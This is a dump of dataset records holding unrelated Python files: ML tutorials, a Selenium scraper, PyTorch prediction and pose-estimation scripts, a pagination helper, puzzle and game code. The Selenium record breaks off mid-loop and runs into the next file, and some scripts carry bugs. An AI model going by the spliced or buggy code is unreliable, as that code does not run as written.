\"\"\"\n\n #corr_matrix = data.corr()\n #attr = ['median_house_value', 'median_income',\n # 'total_rooms', 'housing_median_age']\n\n #scatter_matrix(data[attr])\n #scatter_matrix(data)\n #data.plot(kind='scatter', x='median_income', y='median_house_value',\n # alpha=0.1)\n #plt.show()\n\n # Add meaningful variables to housing dataset\n data['rooms_per_household'] = data['total_rooms']/data['households']\n data['bedrooms_per_room'] = data['total_bedrooms']/data['total_rooms']\n data['population_per_household'] = data['population']/data['households']\n\n # Calculate new correlation matrix with new variables\n corr_matrix = data.corr()\n #print(corr_matrix['median_house_value'].sort_values(ascending=False))\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Prepare the data for Machine Learning algorithms \"\"\"\n data = strat_train_data.drop('median_house_value', axis=1)\n data_labels = strat_train_data['median_house_value'].copy()\n\n # Data Cleaning\n # Methods for eliminating columns\n #data.dropna(subset=['total_bedrooms']) # Method 1\n #data.drop('total_bedrooms', axis=1) # Method 2\n #median = data['total_bedrooms'].median()\n #data['total_bedrooms'].fillna(median) # Method 3 (compute median value\n # on training dataset)\n\n # Methods for filling in missing data\n imputer = Imputer(strategy='median')\n data_num = data.drop('ocean_proximity', axis=1)\n imputer.fit(data_num)\n #print(imputer.statistics_ - data_num.median().values)\n\n #data_tr = pd.DataFrame(imputer.transform(data_num), columns=data_num.columns)\n\n # Encode data as integers\n #encoder = LabelEncoder()\n #data_encoded_int = encoder.fit_transform(data['ocean_proximity'])\n\n # One-hot encoding for categoricals\n #encoder = OneHotEncoder()\n #data_encoded_onehot = encoder.fit_transform(data_encoded_int.reshape(-1, 1))\n #pprint.pprint(data_encoded_onehot)\n\n # One shot one-hot encoding from text categorical to one-hot vectors\n #encoder = LabelBinarizer()\n #data_encoded = encoder.fit_transform(data['ocean_proximity'])\n \n # Add combined attributes\n from CombinedAttributesAdder import CombinedAttributesAdder\n #attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\n #housing_extra_attribs = attr_adder.transform(data.values)\n\n #pprint.pprint(housing_extra_attribs)\n\n num_pipeline = Pipeline([\n ('imputer', Imputer(strategy='median')),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scalar', StandardScaler())\n ])\n\n # The Pipeline constructor takes a list of name/estimator pairs defining a\n # sequence of steps. 
All but the last estimator must be transformers (i.e.,\n    # they must have a fit_transform() method)\n    #data_num_tr = num_pipeline.fit_transform(data_num)\n\n    from future_encoders import ColumnTransformer\n    from future_encoders import OneHotEncoder as OneHotEncoderFtr\n    num_attribs = list(data_num)\n    cat_attribs = ['ocean_proximity']\n\n    full_pipeline = ColumnTransformer([\n            (\"num\", num_pipeline, num_attribs),\n            (\"cat\", OneHotEncoderFtr(), cat_attribs),\n        ])\n\n    data_prepared = full_pipeline.fit_transform(data)\n\n    \"\"\"------------------------------------------------------------------------\"\"\"\n    \"\"\" Select and Train a Model \"\"\"\n    # Training and Evaluating on the Training Set\n    from sklearn.metrics import mean_squared_error\n    def display_scores(scores):\n        print(\"Scores:\", scores)\n        print(\"Mean:\", scores.mean())\n        print(\"Standard deviation:\", scores.std())\n\n    # Linear Regression\n    from sklearn.linear_model import LinearRegression\n    lin_reg = LinearRegression()\n    lin_reg.fit(data_prepared, data_labels) \n    data_predictions = lin_reg.predict(data_prepared)\n    lin_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n    # Decision Tree Regressor\n    from sklearn.tree import DecisionTreeRegressor\n    tree_reg = DecisionTreeRegressor()\n    tree_reg.fit(data_prepared, data_labels)\n    data_predictions = tree_reg.predict(data_prepared)\n    tree_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n    # Evaluating using Cross-Validations\n    # performs K-fold cross-validation: it randomly splits the training set into\n    # 10 distinct subsets called folds, then it trains and evaluates the model\n    # 10 times, picking a different fold for evaluation every time and training\n    # on the other 9 folds.\n    # The result is an array containing the 10 evaluation scores\n    from sklearn.model_selection import cross_val_score\n    # Decision Tree Scores\n    tree_scores = cross_val_score(tree_reg, data_prepared, data_labels, \\\n            scoring='neg_mean_squared_error', cv=10)\n    tree_rmse_scores = np.sqrt(-tree_scores) \n    #print('Decision Tree Regressor Scores:')\n    #display_scores(tree_rmse_scores)\n\n    # Linear Regression Scores\n    lin_scores = cross_val_score(lin_reg, data_prepared, data_labels, \\\n            scoring='neg_mean_squared_error', cv=10)\n    lin_rmse_scores = np.sqrt(-lin_scores)\n    #print('')\n    #print('Linear Regression Scores:')\n    #display_scores(lin_rmse_scores)\n\n    # Random Forests Scores\n    from sklearn.ensemble import RandomForestRegressor\n    forest_reg = RandomForestRegressor(random_state=42)\n    forest_reg.fit(data_prepared, data_labels)\n\n    data_predictions = forest_reg.predict(data_prepared)\n    forest_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n    forest_scores = cross_val_score(forest_reg, data_prepared, data_labels, \\\n            scoring='neg_mean_squared_error', cv=10)\n    forest_rmse_scores = np.sqrt(-forest_scores)\n    #print('')\n    #print('Random Forests Scores:')\n    #display_scores(forest_rmse_scores)\n\n    # Support Vector Regression\n    from sklearn.svm import SVR\n    svm_reg = SVR(kernel=\"linear\")\n    svm_reg.fit(data_prepared, data_labels)\n    data_predictions = svm_reg.predict(data_prepared)\n    svm_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n    #print(lin_rmse)\n    #print(tree_rmse)\n    #print(forest_rmse)\n    #print(svm_rmse)\n\n    \"\"\"------------------------------------------------------------------------\"\"\"\n    \"\"\" Fine-Tune Models \"\"\"\n    # Grid Search\n    from sklearn.model_selection import GridSearchCV\n    param_grid = [\n        # try 6 (2×3) combinations of 
hyperparameters\n {\n 'n_estimators': [30, 100],\n 'max_features': [8, 12, 16]\n },\n # then try 6 (2×3) combinations with bootstrap set as False\n {\n 'bootstrap': [False],\n 'n_estimators': [3, 10],\n 'max_features': [2, 3, 4]\n }\n ]\n\n forest_reg = RandomForestRegressor(random_state=42)\n grid_search = GridSearchCV(forest_reg, param_grid, cv=5, \\\n scoring='neg_mean_squared_error')\n grid_search.fit(data_prepared, data_labels)\n #print(\"grid_search.best_params_:\", grid_search.best_params_)\n #print(\"grid_search.best_estimator_:\", grid_search.best_estimator_)\n \n \"\"\"\n cv_results = grid_search.cv_results_\n for mean_score, params in\\\n zip(cv_results['mean_test_score'], cv_results['params']):\n print(np.sqrt(-mean_score), params)\n \"\"\"\n\n # Randomized Search\n \"\"\"\n from sklearn.model_selection import RandomizedSearchCV\n from scipy.stats import randint\n param_distribs = {\n 'n_estimators': randint(low=1, high=200),\n 'max_features': randint(low=1, high=16)\n }\n\n forest_reg = RandomForestRegressor(random_state=42)\n rnd_search = RandomizedSearchCV(forest_reg,\\\n param_distributions=param_distribs, n_iter=10, cv=5,\\\n scoring='neg_mean_squared_error', random_state=42)\n rnd_search.fit(data_prepared, data_labels)\n \n cv_results = rnd_search.cv_results_\n for mean_score, params in\\\n zip(cv_results['mean_test_score'], cv_results['params']):\n print(np.sqrt(-mean_score), params)\n \"\"\"\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Analyze Best Models and Errors \"\"\"\n \"\"\"\n feature_importances = grid_search.best_estimator_.feature_importances_\n #print(feature_importances)\n\n extra_attribs = [\"rooms_per_hhold\", \"pop_per_hhold\", \"bedrooms_per_room\"]\n cat_encoder = full_pipeline.named_transformers_[\"cat\"]\n cat_one_hot_attribs = list(cat_encoder.categories_[0])\n attributes = num_attribs + extra_attribs + cat_one_hot_attribs\n pprint.pprint(sorted(zip(feature_importances, attributes), reverse=True))\n \"\"\"\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Evaluate the System on the Test Set \"\"\"\n final_model = grid_search.best_estimator_\n\n X_test = strat_test_data.drop('median_house_value', axis=1)\n y_test = strat_test_data['median_house_value'].copy()\n\n X_test_prepared = full_pipeline.transform(X_test)\n final_prediction = final_model.predict(X_test_prepared)\n\n final_rmse = np.sqrt(mean_squared_error(y_test, final_prediction))\n print(final_rmse)\n\nif __name__ == \"__main__\":\n main()","sub_path":"pi_c2/housing_example.py","file_name":"housing_example.py","file_ext":"py","file_size_in_byte":12913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370527633","text":"# encoding:utf-8\r\n\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\nimport execjs\r\nfrom lxml import etree\r\n\r\n\r\ndef getXpath():\r\n option = webdriver.ChromeOptions()\r\n option.add_argument('headless')\r\n driver = webdriver.Chrome(r\"D:\\Selenium WebDriver\\Chrome\\chromedriver_win32\\chromedriver.exe\",\r\n chrome_options=option)\r\n driver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/more/payment/\")\r\n driver.maximize_window()\r\n sleep(1)\r\n\r\n res = driver.execute_script('return document.title')\r\n print(res)\r\n\r\n element = driver.find_element_by_xpath('//*[@id=\"carryId\"]')\r\n id = element.get_property('id')\r\n domObj = 
\"document.getElementById('{}')\".format(id)\r\n\r\n js = \"\"\"\r\n function getPathTo(element) {\r\n var ix= 0;\r\n return element.parentNode\r\n var siblings= element.parentNode.childNodes;\r\n for (var i= 0; i0.5\n actual = actual>0.5\n inter = actual & pred\n union = actual | pred\n\n iou = inter.sum()/(union.sum()+1e-8)\n return iou \n\ndef main(args):\n \"\"\"\n does the prediction for all images in TestDir (the test set)\n prints out iou, compares to the Wu-iou and saves preds to user specified dir \n assumes network output is 2 channels\n \"\"\"\n\n image_folder = args.file_path\n label_folder = args.label_path\n wu_folder = args.wu_pred\n output_path = args.output_path\n flipflag = args.flip_flag ## For TTA, TODO\n model_arch = args.model_arch\n model_path = args.model_path\n save_flag = args.save_flag\n verbose = False\n print(\" output folder is \", output_folder)\n\n\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_use # set GPU to use\n\n print(\" start loading models with arch: \",model_arch)\n parallel_flag=False\n gpu_flag=True\n model = load_models.getModel(model_arch=model_arch,output_channels=output_channels,parallel_flag=parallel_flag)\n curr_dict = torch.load(model_path, map_location=lambda storage, loc: storage)['model_state'] # this is wrapped in DataParallel so need to undo it\n model_dict = OrderedDict()\n for k, v in curr_dict.items():\n name = k[7:]\n model_dict[name] = v\n model.load_state_dict(model_dict)\n print(\"---------loaded state dict----\")\n\n if verbose==True:\n print(\" ------ printing model on screen --------- \")\n for param_tensor in model.state_dict():\n print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n print(\" ----------------------------------------- \")\n model.eval()\n\n\n toc = time.time(); count_files=0\t\n for files in os.listdir(image_folder):\n filename, ext = os.path.splitext(files)\n image_file = os.path.join(image_folder, filename) +\".npy\"\n label_file = os.path.join(label_folder, filename) +\".npy\"\n wu_file = os.path.join(wu_folder, filename) +\".npy\"\n\n image_load = np.load(image_file)\n label_load = np.load(label_file)\n wu_pred = np.load(wu_file)\n wu_pred[wu_pred>0.9]=1; wu_pred[wu_pred!=1]=0 # this threshold works best for wu\n\n label_load = label_load.transpose(2,1,0)\n wu_pred = wu_pred.transpose(2,1,0)\n\n image_load = (image_load - np.mean(image_load))/np.std(image_load)\n image_load = image_load.transpose(2,1,0)\n image_load = np.expand_dims(image_load,0)\n image_load = np.expand_dims(image_load,0) # 1,1,Z,X,Y\n\n with torch.no_grad():\n image_tensor = torch.from_numpy(image_load).float().cuda()\n preds = model(image_tensor)\n\n logits = preds['logits']\n probits = F.softmax(logits,dim=1).data.cpu().numpy()\n pred_argmax = np.argmax(probits[0,:,:,:,:], axis=0).astype(np.float32)\n iou_preds = computeiou(pred_argmax,label_load)\n iou_wu = computeiou(wu_pred,label_load)\n print(\" ---- for filename %s iou preds: %f wu-model: %f ----\"%(filename,iou_preds,iou_wu))\n\n if save_flag==True:\n output_file = os.path.join(out_folder,filename)+\".npy\"\n np.save(output_file, pred_argmax.transpose(2,1,0)) # save in X,Y,Z format same as test labels/images\n\n count_files +=1\n\n tic = time.time()\t\n print(\"=====================================================\")\n print(\" Done prediction for %d files in %f s\" %(count_files, tic-toc))\n print(\"=====================================================\")\n\nif __name__ == '__main__':\n help_string = 
\"PyTorch Fault prediction\"\n\n parser = argparse.ArgumentParser(description=help_string)\n\n parser.add_argument('-f', '--file-path', type=str, metavar='DIR', help='Path where test images is located', required=True)\n parser.add_argument('-l', '--label-path', type=str, metavar='DIR', help='Path where test data labels is located', required=True)\n parser.add_argument('-w', '--wu-pred', type=str, metavar='DIR', help='Path where WU-predictions is located', required=True)\n parser.add_argument('-o', '--output-path', type=str, metavar='DIR', help='Path where predictions will be written out', required=True)\n parser.add_argument('-m', '--model-path', type=str, metavar='DIR', help='Path where trained model is stored', required=True)\n parser.add_argument('-arch', '--model-arch', type=str, metavar='ARCH', help='Architecture of the model (default: LinkNet34)', default='linknet34', required=False)\n\n parser.add_argument('-flipflag', '--flip-flag', type=int, metavar='W', help='flip image during test for TTA 0 or 1', default=0, required=True)\n parser.add_argument('-gpu-use', '--gpu-use', type=str, metavar='H', help='which gpu to use(default: 0)', default=0, required=True)\n\n args = parser.parse_args()\n\n main(args)\n\n sys.exit(1)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"369709148","text":"#constructor is used to initialise instance variables\n\n# class Person:\n# def __init__(self,name,age,adress): #constructor\n# self.name=name\n# self.age=age\n# self.adress=adress\n# def printval(self):\n# print(self.name,self.age,self.adress)\n# obj=Person('Anu',26,'abc')\n# obj.printval()\n\n#......................................Employee Class........................\nclass Employee:\n cname='Luminar'\n def __init__(self,name,dept,salary):\n self.name=name\n self.dept=dept\n self.salary=salary\n def printval(self):\n print(self.name,self.dept,self.salary,Employee.cname)\nobj=Employee('Anu','design',25000)\nobj.printval()","sub_path":"oop/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204798633","text":"\"\"\"\nDemo code shows how to estimate human head pose.\nHuman face is detected by a detector from an OpenCV DNN module.\nThen, the face box is slightly modified to suit the need of landmark detection.\nFacial landmark detection is done by a custom Convolutional Neural Network trained with TensorFlow.\nFinally, head pose is estimated by solving a PnP problem.\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom multiprocessing import Process, Queue\n\nfrom cv2 import cv2\nimport numpy as np\n\nfrom markDetector import MarkDetector\nfrom osDetector import detectOS\nfrom poseEstimator import PoseEstimator\nfrom stabilizer import Stabilizer\n\nprint(\"OpenCV version: {}\".format(cv2.__version__))\n\n# multiprocessing may not work on Windows and macOS, check OS for safety\ndetectOS()\n\nCNN_INPUT_SIZE = 128\n\n# take arguments from user input\nparser = ArgumentParser()\nparser.add_argument(\"--video\", type=str, default=None,\n help=\"Video file to be processed.\")\nparser.add_argument(\"--cam\", type=int, default=None,\n help=\"The webcam index.\")\nargs = parser.parse_args()\n\n\ndef getFace(detector, imgQueue, boxQueue):\n \"\"\"Get face from image queue. 
\n\ndef getFace(detector, imgQueue, boxQueue):\n    \"\"\"Get face from image queue. This function is used for multiprocessing.\"\"\"\n    while True:\n        image = imgQueue.get()\n        box = detector.extractCNNFacebox(image)\n        boxQueue.put(box)\n\n\ndef main():\n    \"\"\"MAIN\"\"\"\n    # video source from webcam or video file\n    videoSource = args.cam if args.cam is not None else args.video\n    if videoSource is None:\n        print(\"Warning: video source not assigned, default webcam will be used.\")\n        videoSource = 0\n\n    cap = cv2.VideoCapture(videoSource)\n    if videoSource == 0:\n        cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n    _, sampleFrame = cap.read()\n\n    # introduce markDetector to detect landmarks\n    markDetector = MarkDetector()\n\n    # setup process and queues for multiprocessing\n    imgQueue = Queue()\n    boxQueue = Queue()\n    imgQueue.put(sampleFrame)\n    boxProcess = Process(target=getFace, args=(\n        markDetector, imgQueue, boxQueue,))\n    boxProcess.start()\n\n    # introduce pose estimator to solve pose\n    # get one frame to setup the estimator according to the image size\n    height, width = sampleFrame.shape[:2]\n    poseEstimator = PoseEstimator(imgSize=(height, width))\n\n    # introduce scalar stabilizers for pose\n    poseStabilizers = [Stabilizer(\n        stateNum=2,\n        measureNum=1,\n        covProcess=0.1,\n        covMeasure=0.1) for _ in range(6)]\n\n    tm = cv2.TickMeter()\n\n    while True:\n        # read frame, crop it, flip it, suits your needs\n        frameGot, frame = cap.read()\n        if frameGot is False:\n            break\n\n        # crop it if frame is larger than expected\n        # frame = frame[0:480, 300:940]\n\n        # if frame comes from webcam, flip it so it looks like a mirror\n        if videoSource == 0:\n            frame = cv2.flip(frame, 2)\n\n        # Pose estimation by 3 steps:\n        # 1. detect face\n        # 2. detect landmarks\n        # 3. estimate pose\n\n        # feed frame to image queue\n        imgQueue.put(frame)\n\n        # get face from box queue\n        facebox = boxQueue.get()\n\n        if facebox is not None:\n            # detect landmarks from image of 128x128\n            faceImg = frame[facebox[1]: facebox[3],\n                            facebox[0]: facebox[2]]\n            faceImg = cv2.resize(faceImg, (CNN_INPUT_SIZE, CNN_INPUT_SIZE))\n            faceImg = cv2.cvtColor(faceImg, cv2.COLOR_BGR2RGB)\n\n            tm.start()\n            marks = markDetector.detectMarks([faceImg])\n            tm.stop()\n\n            # convert the marks locations from local CNN to global image\n            marks *= (facebox[2] - facebox[0])\n            marks[:, 0] += facebox[0]\n            marks[:, 1] += facebox[1]\n\n            # uncomment following line to show raw marks\n            # markDetector.drawMarks(frame, marks, color=(0, 255, 0))\n\n            # uncomment following line to show facebox\n            # markDetector.drawBox(frame, [facebox])\n\n            # try pose estimation with 68 points\n            pose = poseEstimator.solvePoseBy68Points(marks)\n\n            # stabilize the pose\n            steadyPose = []\n            poseNp = np.array(pose).flatten()\n            for value, psStb in zip(poseNp, poseStabilizers):\n                psStb.update([value])\n                steadyPose.append(psStb.state[0])\n            steadyPose = np.reshape(steadyPose, (-1, 3))\n\n            # uncomment following line to draw pose annotation on frame\n            # poseEstimator.drawAnnotationBox(frame, pose[0], pose[1], color=(255, 128, 128))\n\n            # draw the stable pose annotation on frame\n            poseEstimator.drawAnnotationBox(\n                frame, steadyPose[0], steadyPose[1], color=(128, 255, 128))\n\n            # uncomment following line to draw head axes on frame\n            # poseEstimator.drawAxes(frame, steadyPose[0], steadyPose[1])\n\n        # Show preview.\n        cv2.imshow(\"Preview\", frame)\n        if cv2.waitKey(10) == 27:\n            break\n\n    # Clean up the multiprocessing process.\n    boxProcess.terminate()\n    boxProcess.join()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Dense_Motion_Estimation/Head Pose 
Estimation/estimateHeadPose.py","file_name":"estimateHeadPose.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509832250","text":"# Copyright (c) 2017 FlashX, LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport base64\nimport graphene\n\n\nclass ListBasedConnection(object):\n def __init__(self, edges, cursors, args):\n \"\"\"Class to provide Relay compliant pagination for list based connections\n\n Args:\n edges(list): A list of edge data\n cursors(list): A list of cursors for edges\n args(dict): The input arguments to the resolve method\n\n Returns:\n ListBasedConnection\n \"\"\"\n self.edges = edges\n self.cursors = cursors\n self.args = args\n self.page_info = None\n\n def apply(self):\n \"\"\"Method to apply cursors to the edges\n\n Returns:\n None\n \"\"\"\n\n if \"first\" in self.args and \"last\" in self.args:\n raise ValueError(\"`first` and `last` arguments cannot be used together\")\n\n # Verify valid slicing args\n if \"first\" in self.args:\n if int(self.args[\"first\"]) < 0:\n raise ValueError(\"`first` must be greater than 0\")\n if \"last\" in self.args:\n if int(self.args[\"last\"]) < 0:\n raise ValueError(\"`last` must be greater than 0\")\n\n # Apply cursor filters\n after_index = None\n before_index = None\n if \"after\" in self.args:\n if self.args[\"after\"] in self.cursors:\n # Remove edges after cursor\n after_index = int(base64.b64decode(self.args[\"after\"]))\n else:\n raise ValueError(\"`after` cursor is invalid\")\n\n if \"before\" in self.args:\n if self.args[\"before\"] in self.cursors:\n # Remove edges after cursor\n before_index = int(base64.b64decode(self.args[\"before\"]))\n else:\n raise ValueError(\"`before` cursor is invalid\")\n\n if after_index is not None and before_index is not None:\n self.edges = self.edges[after_index + 1:before_index]\n self.cursors = self.cursors[after_index + 1:before_index]\n elif after_index is not None:\n self.edges = self.edges[after_index + 1:]\n self.cursors = self.cursors[after_index + 1:]\n elif before_index is not None:\n self.edges = self.edges[:before_index]\n self.cursors = self.cursors[:before_index]\n\n pre_slice_len = len(self.edges)\n\n # Apply slicing filters\n if \"first\" in self.args:\n if len(self.edges) > int(self.args[\"first\"]):\n self.edges = self.edges[:int(self.args[\"first\"])]\n self.cursors = self.cursors[:int(self.args[\"first\"])]\n\n if \"last\" in self.args:\n if 
len(self.edges) > int(self.args[\"last\"]):\n self.edges = self.edges[-int(self.args[\"last\"]):]\n self.cursors = self.cursors[-int(self.args[\"last\"]):]\n\n # Compute page info status\n has_previous_page = False\n if \"last\" not in self.args or len(self.edges) == 0:\n has_previous_page = False\n elif pre_slice_len > int(self.args[\"last\"]):\n has_previous_page = True\n\n has_next_page = False\n if \"first\" not in self.args or len(self.edges) == 0:\n has_next_page = False\n elif pre_slice_len > int(self.args[\"first\"]):\n has_next_page = True\n\n if len(self.edges) == 0:\n start_cursor, end_cursor = None, None\n else:\n start_cursor, end_cursor = self.cursors[0], self.cursors[-1]\n\n # startCursor and endCursor\n self.page_info = graphene.relay.PageInfo(has_next_page=has_next_page, has_previous_page=has_previous_page,\n start_cursor=start_cursor, end_cursor=end_cursor)\n","sub_path":"lmsrvcore/api/connections/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"5630059","text":"class Solution(object):\n def solveNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: List[List[str]]\n \"\"\"\n def dfs(queens, xy_diff, xy_sum):\n q = len(queens)\n if q == n:\n ret.append(queens)\n return\n for p in range(n):\n if p+q not in xy_sum and p-q not in xy_diff and p not in queens:\n xy_diff.add(p-q)\n xy_sum.add(p+q)\n dfs(queens+[p], xy_diff, xy_sum)\n xy_diff.remove(p-q)\n xy_sum.remove(p+q)\n ret = []\n dfs([], set(), set())\n print(ret)\n return [['.'*i + 'Q' + '.'*(n-i-1) for i in board] for board in ret]\n","sub_path":"51_N-Queens_H.py","file_name":"51_N-Queens_H.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188313581","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom codes.model.base_model import BaseModel\nfrom codes.model.imagination_model.util import get_component\nfrom codes.utils.util import get_product_of_iterable\n\n\nclass Model(BaseModel):\n \"\"\"Recurrent Environment Simulator.\n This model uses the observation-dependent path\"\"\"\n\n def __init__(self, config):\n super(Model, self).__init__(config=config)\n self.convolutional_encoder = get_component(\"convolutional_encoder\", config)\n self.state_transition_model = get_component(\"state_transition_model\", config)\n self.convolutional_decoder = get_component(\"convolutional_decoder\", config)\n self.weights = self.get_weights_dict()\n\n def get_weights_dict(self):\n _latent_size = self.config.model.imagination_model.latent_size\n _hidden_state_size = self.config.model.imagination_model.hidden_state_size\n _action_size = get_product_of_iterable(self.config.env.action_space[\"shape\"])\n return torch.nn.ModuleDict({\n \"w_action\": torch.nn.Sequential(\n nn.Linear(_action_size, _latent_size)\n ),\n \"w_h\": torch.nn.Sequential(\n nn.Linear(_hidden_state_size, _latent_size)\n ),\n\n })\n\n def encode_obs(self, obs):\n obs_shape = obs.shape\n per_image_shape = obs_shape[-3:]\n batch_size = obs_shape[0]\n trajectory_length = obs_shape[1]\n num_frames = obs_shape[2]\n h_t = self.convolutional_encoder(obs.view(-1, *per_image_shape)).view(batch_size, trajectory_length, num_frames, -1)\n h_t = torch.mean(h_t, dim=2)\n return h_t, trajectory_length\n\n def decode_obs(self, output, trajectory_length):\n reconstructed_obs = self.convolutional_decoder(output)\n per_image_shape = 
reconstructed_obs.shape[-3:]\n        batch_size = int(reconstructed_obs.shape[0]/trajectory_length)\n        return reconstructed_obs.view(batch_size, trajectory_length, *per_image_shape)\n\n\n    def forward(self, x):\n        # note that x is the same as x_(t-1)\n\n        h_t, trajectory_length = self.encode_obs(obs = x.obs)\n        action = x.action\n\n        # action = (x.action).view(effective_batch_size, -1)\n\n        # mu, logsigma = self.variational_encoder(h_t)\n        # sigma = logsigma.exp()\n        # eps = torch.randn_like(sigma)\n        # z_t = eps.mul(sigma).add_(mu)\n        self.state_transition_model.set_state(h_t[:,0,:])\n        output = []\n        for t in range(0, trajectory_length):\n            action_fusion = self.weights[\"w_action\"](action[:,t,:]) * self.weights[\"w_h\"](self.state_transition_model.h_0.squeeze(0))\n            inp = torch.cat((action_fusion, h_t[:,t,:]), dim=1)\n            output.append(self.state_transition_model(inp.unsqueeze(1)))\n        output = torch.cat(output, dim=1).view(-1, self.config.model.imagination_model.hidden_state_size)\n        reconstructed_obs = self.decode_obs(output, trajectory_length)\n        return reconstructed_obs\n\n\n    def loss(self, output, x):\n        \"\"\" loss function \"\"\"\n        true_obs = x.next_obs\n        # Note that we have to manually divide because of an issue in Pytorch. The fix is available only in master for now.\n        return F.mse_loss(true_obs[:, :, 3, :, :, :], output) * 255 / (get_product_of_iterable(output.shape))\n\n","sub_path":"codes/model/imagination_model/recurrent_environment_simulator_obs_dependent_path_deterministic.py","file_name":"recurrent_environment_simulator_obs_dependent_path_deterministic.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"361020685","text":"import random\r\n\r\nfrom pytictactoe.field import Field\r\nfrom pytictactoe.field_type import FieldType\r\nfrom pytictactoe.player import ai_service\r\nfrom pytictactoe.player.base_player import BasePlayer\r\n\r\n\r\nclass CleverPlayer(BasePlayer):\r\n\r\n    def get_str_player(self):\r\n        if self.get_my_field_type() == FieldType.X:\r\n            return 'X'\r\n        elif self.get_my_field_type() == FieldType.O:\r\n            return 'O'\r\n        else:\r\n            raise RuntimeError('Unknown FieldType for Player')\r\n\r\n\r\n    def grid_to_list(self,grid):\r\n        s = ''\r\n        for y in range (0,3):\r\n            for x in range (0, 3):\r\n                if grid.get_field(x, y) == FieldType.EMPTY:\r\n                    s += '-'\r\n                elif grid.get_field(x, y) == FieldType.O:\r\n                    s += 'O'\r\n                elif grid.get_field(x, y) == FieldType.X:\r\n                    s += 'X'\r\n                else:\r\n                    raise RuntimeError('Unknown FieldType on Board')\r\n\r\n        return s\r\n\r\n    def choose_field(self, grid):\r\n        grid_str = self.grid_to_list(grid)\r\n        player_str = self.get_str_player()\r\n\r\n        cost, move = ai_service.nextMove(list(grid_str), player_str)\r\n\r\n        x = int(move % 3)\r\n        y = int(move / 3)\r\n\r\n\r\n        allowed = False\r\n        while not allowed:\r\n            field = Field(x, y)\r\n            allowed = yield field\r\n            if allowed:\r\n                yield None\r\n            else:\r\n                print(\"Try it again, field is already chosen.\\n\")","sub_path":"pytictactoe/player/clever_player.py","file_name":"clever_player.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615298866","text":"import tkinter as tk\n\nclass NotsCrosses(tk.Frame):\n    def __init__(self, parent):\n        tk.Frame.__init__(self, parent)\n        #Title\n\n        #Board\n        #Add tiles\n\n        #Menu buttons\n\nroot = tk.Tk()\nroot.geometry(\"400x500\")\n\napp = NotsCrosses(root)\napp.pack()\nroot.mainloop()","sub_path":"Bad 
NC/NotsCrossesGUI.py","file_name":"NotsCrossesGUI.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286156037","text":"\"\"\"Input layer code (`Input` and `InputLayer`).\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom .base_layer import Layer\nfrom .base_layer import Node\nfrom .. import backend as K\nfrom ..legacy import interfaces\n\n\nclass InputLayer(Layer):\n    \"\"\"Layer to be used as an entry point into a model.\n\n    It can either wrap an existing tensor (pass an `input_tensor` argument)\n    or create a placeholder tensor (pass arguments `input_shape`\n    or `batch_input_shape` as well as `dtype`).\n\n    # Arguments\n        input_shape: Shape tuple, not including the batch axis.\n        batch_size: Optional input batch size (integer or None).\n        batch_input_shape: Shape tuple, including the batch axis.\n        dtype: Datatype of the input.\n        